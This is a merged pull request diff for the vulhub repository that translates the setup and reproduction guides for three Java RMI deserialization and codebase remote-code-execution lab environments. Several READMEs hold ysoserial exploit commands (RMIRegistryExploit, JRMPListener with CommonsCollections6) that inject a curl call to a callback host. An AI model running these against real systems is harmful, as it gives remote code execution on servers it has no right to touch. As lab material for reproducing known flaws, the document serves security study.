Merge pull request vulhub#617 from vulhub/java-translate

Update Java RMI documentation

environments.toml

@@ -623,13 +623,13 @@ app = "Java RMI"
 path = "java/rmi-codebase"
 
 [[environment]]
-name = "Java RMI Registry Deserialization Vulnerability (<=jdk8u111)"
+name = "Java ≤JDK 8u111 RMI Registry Deserialization Remote Code Execution"
 cve = []
 app = "Java RMI"
 path = "java/rmi-registry-bind-deserialization"
 
 [[environment]]
-name = "Java RMI Registry Deserialization Vulnerability (<jdk8u232_b09)"
+name = "Java < JDK8u232_b09 RMI Registry Deserialization Remote Code Execution Bypass"
 cve = []
 app = "Java RMI"
 path = "java/rmi-registry-bind-deserialization-bypass"

java/rmi-codebase/README.md

@@ -1,20 +1,27 @@
-# Java RMI codebase 远程代码执行漏洞
+# Java RMI Codebase Remote Code Execution
 
-Java Remote Method Invocation 用于在Java中进行远程调用，在满足一定条件的情况下，RMI客户端通过指定`java.rmi.server.codebase`可以让服务端远程加载对象，进而加载远程java字节码执行任意代码。
+[中文版本(Chinese version)](README.zh-cn.md)
 
-## 漏洞环境
+Java Remote Method Invocation (RMI) is used for remote procedure calls in Java. Under certain conditions, an RMI client can specify `java.rmi.server.codebase` to make the server load remote objects, leading to the execution of arbitrary Java bytecode on the server.
 
-执行如下命令编译及启动RMI Registry和服务器：
+References:
+
+- <https://docs.oracle.com/javase/7/docs/technotes/guides/rmi/codebase.html>
+- <https://paper.seebug.org/1091/>
+
+## Environment Setup
+
+Execute the following commands to compile and start the RMI Registry and server:
 
 ```
 docker compose build
 docker compose run -e RMIIP=your-ip -p 1099:1099 -p 64000:64000 rmi
 ```
 
-其中，`your-ip`是服务器IP，客户端会根据这个IP来连接服务器。
+Replace `your-ip` with your server's IP address. The client will use this IP to connect to the server.
 
-环境启动后，RMI Registry监听在1099端口。
+After startup, the RMI Registry will be listening on port 1099.
 
-## 漏洞复现
+## Vulnerability Reproduction
 
-待完善。
+To be completed.

java/rmi-codebase/README.zh-cn.md

@@ -0,0 +1,25 @@
+# Java RMI Codebase 远程代码执行漏洞
+
+Java Remote Method Invocation（RMI）是Java中用于远程过程调用的机制。在满足特定条件的情况下，RMI客户端可以通过指定`java.rmi.server.codebase`参数，使服务端加载远程对象，从而执行任意Java字节码。
+
+参考链接：
+
+- <https://docs.oracle.com/javase/7/docs/technotes/guides/rmi/codebase.html>
+- <https://paper.seebug.org/1091/>
+
+## 环境搭建
+
+执行如下命令编译及启动RMI Registry和服务器：
+
+```
+docker compose build
+docker compose run -e RMIIP=your-ip -p 1099:1099 -p 64000:64000 rmi
+```
+
+将`your-ip`替换为你的服务器IP地址，客户端将使用此IP连接服务器。
+
+环境启动后，RMI Registry将监听在1099端口。
+
+## 漏洞复现
+
+待完善。

java/rmi-codebase/docker-compose.yml

@@ -1,4 +1,3 @@
-version: '2'
 services:
   rmi:
     build: .

java/rmi-registry-bind-deserialization-bypass/README.md

@@ -1,8 +1,10 @@
-# Java RMI Registry 反序列化漏洞(<jdk8u232_b09)
+# Java < JDK8u232_b09 RMI Registry Deserialization Remote Code Execution Bypass
 
-Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind)，在bind过程中，伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象)，使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1).
+[中文版本(Chinese version)](README.zh-cn.md)
 
-自jdk8u121起，Registry对反序列化的类做了白名单限制
+Java Remote Method Invocation (RMI) is used for remote procedure calls in Java. Although remote binding is typically disabled, RMI Registry contains a remote binding functionality that can be exploited. By forging serialized data (implementing the Remote interface or dynamically proxying objects that implement the Remote interface) during the binding process, an attacker can trigger a deserialization vulnerability in the Registry when it processes the data.
+
+Since JDK 8u121, the Registry implements a whitelist restriction for deserialized classes:
 
 ```java
 if (String.class == clazz
@@ -20,33 +22,37 @@ if (String.class == clazz
 }
 ```
 
-我们需要在上面的几个白名单里面找到相应的可利用的类
-具体原理见[浅谈RMI Registry反序列化问题](http://blog.0kami.cn/2020/02/06/rmi-registry-security-problem/)
+We need to find exploitable classes within these whitelisted classes. For more details, see [A Discussion on RMI Registry Deserialization Issues](https://blog.0kami.cn/blog/2020/rmi-registry-security-problem-20200206/), this article introduces the bypass methods that use JRMPListener to bypass the whitelist restriction.
+
+References:
+
+- <https://blog.0kami.cn/blog/2020/rmi-registry-security-problem-20200206/>
+- <https://github.com/wh1t3p1g/ysoserial>
 
-## 漏洞环境
+## Environment Setup
 
-执行如下命令编译及启动RMI Registry和服务器：
+Execute the following commands to compile and start the RMI Registry and server:
 
 ```
 docker compose build
 docker compose run -e RMIIP=your-ip -p 1099:1099 rmi
 ```
 
-其中，`your-ip`是服务器IP，客户端会根据这个IP来连接服务器。
+Replace `your-ip` with your server's IP address. The client will use this IP to connect to the server.
 
-环境启动后，RMI Registry监听在1099端口。
+After startup, the RMI Registry will be listening on port 1099.
 
-## 漏洞复现
+## Vulnerability Reproduction
 
-通过[ysoserial](https://github.com/wh1t3p1g/ysoserial)的exploit包中的RMIRegistryExploit2或者3进行攻击
+Use RMIRegistryExploit2 or RMIRegistryExploit3 from [ysoserial](https://github.com/wh1t3p1g/ysoserial)'s exploit package to perform the attack:
 
 ```bash
-// 开启JRMPListener
+# Start JRMPListener
 java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections6 "curl http://xxxxx.burpcollaborator.net"
-// 发起攻击
+# Launch the attack
 java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit2 192.168.31.88 1099 jrmphost 8888
 ```
 
-![image-20200206135822418](assets/README/image-20200206135822418.png)
+![](1.png)
 
-Registry会返回报错，这个没关系正常，命令会正常执行。
+The Registry will return an error, but this is normal and the command will still execute successfully.

java/rmi-registry-bind-deserialization-bypass/README.zh-cn.md

@@ -0,0 +1,56 @@
+# Java < JDK8u232_b09 RMI Registry 反序列化远程代码执行绕过
+
+Java Remote Method Invocation（RMI）是Java中用于远程过程调用的机制。尽管远程绑定通常是被禁用的，但RMI Registry中包含一个可被利用的远程绑定功能。攻击者可以在绑定过程中，通过伪造序列化数据（实现Remote接口或动态代理实现了Remote接口的对象），使Registry在对数据进行反序列化时触发相应的利用链。
+
+自JDK 8u121起，Registry对反序列化的类实施了白名单限制：
+
+```java
+if (String.class == clazz
+        || java.lang.Number.class.isAssignableFrom(clazz)
+        || Remote.class.isAssignableFrom(clazz)
+        || java.lang.reflect.Proxy.class.isAssignableFrom(clazz)
+        || UnicastRef.class.isAssignableFrom(clazz)
+        || RMIClientSocketFactory.class.isAssignableFrom(clazz)
+        || RMIServerSocketFactory.class.isAssignableFrom(clazz)
+        || java.rmi.activation.ActivationID.class.isAssignableFrom(clazz)
+        || java.rmi.server.UID.class.isAssignableFrom(clazz)) {
+    return ObjectInputFilter.Status.ALLOWED;
+} else {
+    return ObjectInputFilter.Status.REJECTED;
+}
+```
+
+我们需要在这些白名单类中找到可利用的类。详细原理请参考[浅谈RMI Registry反序列化问题](https://blog.0kami.cn/blog/2020/rmi-registry-security-problem-20200206/)。
+
+参考链接：
+
+- <https://blog.0kami.cn/blog/2020/rmi-registry-security-problem-20200206/>
+- <https://github.com/wh1t3p1g/ysoserial>
+
+## 环境搭建
+
+执行如下命令编译及启动RMI Registry和服务器：
+
+```
+docker compose build
+docker compose run -e RMIIP=your-ip -p 1099:1099 rmi
+```
+
+将`your-ip`替换为你的服务器IP地址，客户端将使用此IP连接服务器。
+
+环境启动后，RMI Registry将监听在1099端口。
+
+## 漏洞复现
+
+使用[ysoserial](https://github.com/wh1t3p1g/ysoserial)的exploit包中的RMIRegistryExploit2或RMIRegistryExploit3进行攻击：
+
+```bash
+# 启动JRMPListener
+java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections6 "curl http://xxxxx.burpcollaborator.net"
+# 发起攻击
+java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit2 192.168.31.88 1099 jrmphost 8888
+```
+
+![](1.png)
+
+Registry会返回报错，这是正常现象，命令仍会成功执行。

java/rmi-registry-bind-deserialization-bypass/docker-compose.yml

@@ -1,4 +1,3 @@
-version: '3'
 services:
   rmi:
     build: "."

java/rmi-registry-bind-deserialization/README.md

@@ -1,28 +1,35 @@
-# Java RMI Registry 反序列化漏洞(<=jdk8u111)
+# Java ≤JDK 8u111 RMI Registry Deserialization Remote Code Execution
 
-Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind)，在bind过程中，伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象)，使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1).
+[中文版本(Chinese version)](README.zh-cn.md)
 
-## 漏洞环境
+Java Remote Method Invocation (RMI) is used for remote procedure calls in Java. Although remote binding is typically disabled, RMI Registry contains a remote binding functionality that can be exploited. By forging serialized data (implementing the Remote interface or dynamically proxying objects that implement the Remote interface) during the binding process, an attacker can trigger a deserialization vulnerability in the Registry when it processes the data. This environment uses commons-collections:3.2.1 for demonstration.
 
-执行如下命令编译及启动RMI Registry和服务器：
+References:
+
+- <https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server>
+- <https://github.com/frohoff/ysoserial>
+
+## Environment Setup
+
+Execute the following commands to compile and start the RMI Registry and server:
 
 ```
 docker compose build
 docker compose run -e RMIIP=your-ip -p 1099:1099 rmi
 ```
 
-其中，`your-ip`是服务器IP，客户端会根据这个IP来连接服务器。
+Replace `your-ip` with your server's IP address. The client will use this IP to connect to the server.
 
-环境启动后，RMI Registry监听在1099端口。
+After startup, the RMI Registry will be listening on port 1099.
 
-## 漏洞复现
+## Vulnerability Reproduction
 
-通过ysoserial的exploit包中的RMIRegistryExploit进行攻击
+Use the RMIRegistryExploit from ysoserial's exploit package to perform the attack:
 
 ```bash
 java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"
 ```
 
-![image-20200206133552945](assets/README/image-20200206133552945.png)
+![](1.png)
 
-Registry会返回报错，这个没关系正常，命令会正常执行。
+The Registry will return an error, but this is normal and the command will still execute successfully.

java/rmi-registry-bind-deserialization/README.zh-cn.md

@@ -0,0 +1,33 @@
+# Java ≤JDK 8u111 RMI Registry 反序列化命令执行
+
+Java Remote Method Invocation（RMI）是Java中用于远程过程调用的机制。尽管远程绑定通常是被禁用的，但RMI Registry中包含一个可被利用的远程绑定功能。攻击者可以在绑定过程中，通过伪造序列化数据（实现Remote接口或动态代理实现了Remote接口的对象），使Registry在对数据进行反序列化时触发相应的利用链。本环境使用commons-collections:3.2.1进行演示。
+
+参考链接：
+
+- <https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server>
+- <https://github.com/frohoff/ysoserial>
+
+## 环境搭建
+
+执行如下命令编译及启动RMI Registry和服务器：
+
+```
+docker compose build
+docker compose run -e RMIIP=your-ip -p 1099:1099 rmi
+```
+
+将`your-ip`替换为你的服务器IP地址，客户端将使用此IP连接服务器。
+
+环境启动后，RMI Registry将监听在1099端口。
+
+## 漏洞复现
+
+使用ysoserial的exploit包中的RMIRegistryExploit进行攻击：
+
+```bash
+java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "curl your-dnslog-server"
+```
+
+![](1.png)
+
+Registry会返回报错，这是正常现象，命令仍会成功执行。

java/rmi-registry-bind-deserialization/docker-compose.yml

@@ -1,4 +1,3 @@
-version: '3'
 services:
   rmi:
     build: "."